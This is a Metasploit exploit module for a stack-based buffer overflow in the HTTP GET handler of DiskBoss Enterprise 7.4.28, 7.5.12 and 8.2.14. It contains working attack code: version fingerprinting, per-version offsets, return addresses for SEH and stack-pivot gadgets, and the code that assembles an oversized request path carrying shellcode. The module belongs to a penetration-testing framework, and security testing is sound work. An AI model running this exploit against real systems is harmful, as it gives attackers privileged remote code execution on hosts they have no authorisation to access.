modules/exploits/windows/http/diskboss_get_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,
caused by improper bounds checking of the request path in HTTP GET
requests sent to the built-in web server. This module has been
tested successfully on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'vportal', # Vulnerability discovery and PoC
'Ahmad Mahfouz', # Vulnerability discovery and PoC
'Gabor Seljan', # Metasploit module
'Jacob Robles' # Metasploit module
],
'References' =>
[
['EDB', '40869'],
['EDB', '42395']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x09\x0a\x0d\x20",
'Space' => 2000
},
'Targets' =>
[
[
'Automatic Targeting',
{
'auto' => true
}
],
[
'DiskBoss Enterprise v7.4.28',
{
'Offset' => 2471,
'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
}
],
[
'DiskBoss Enterprise v7.5.12',
{
'Offset' => 2471,
'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
}
],
[
'DiskBoss Enterprise v8.2.14',
{
'Offset' => 2496,
'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]
}
]
],
'Privileged' => true,
'DisclosureDate' => '2016-12-05',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)
if res && res.code == 200
if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/
return Exploit::CheckCode::Vulnerable
elsif res.body =~ /DiskBoss Enterprise/
return Exploit::CheckCode::Detected
end
else
vprint_error('Unable to determine due to a HTTP connection timeout')
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def exploit
mytarget = target
if target['auto']
mytarget = nil
print_status('Automatically detecting the target...')
res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)
if res && res.code == 200
if res.body =~ /DiskBoss Enterprise v7\.4\.28/
mytarget = targets[1]
elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
mytarget = targets[2]
elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/
mytarget = targets[3]
end
end
if !mytarget
fail_with(Failure::NoTarget, 'No matching target')
end
print_status("Selected Target: #{mytarget.name}")
end
case mytarget
when targets[1], targets[2]
sploit = make_nops(21)
sploit << payload.encoded
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit << [mytarget.ret].pack('V')
sploit << rand_text_alpha(2500)
when targets[3]
seh = generate_seh_record(mytarget.ret)
sploit = payload.encoded
sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
sploit[sploit.length, seh.length] = seh
sploit << make_nops(10)
sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode
sploit << rand_text_alpha(5000 - sploit.length)
else
fail_with(Failure::NoTarget, 'No matching target')
end
send_request_cgi(
'method' => 'GET',
'uri' => sploit
)
end
end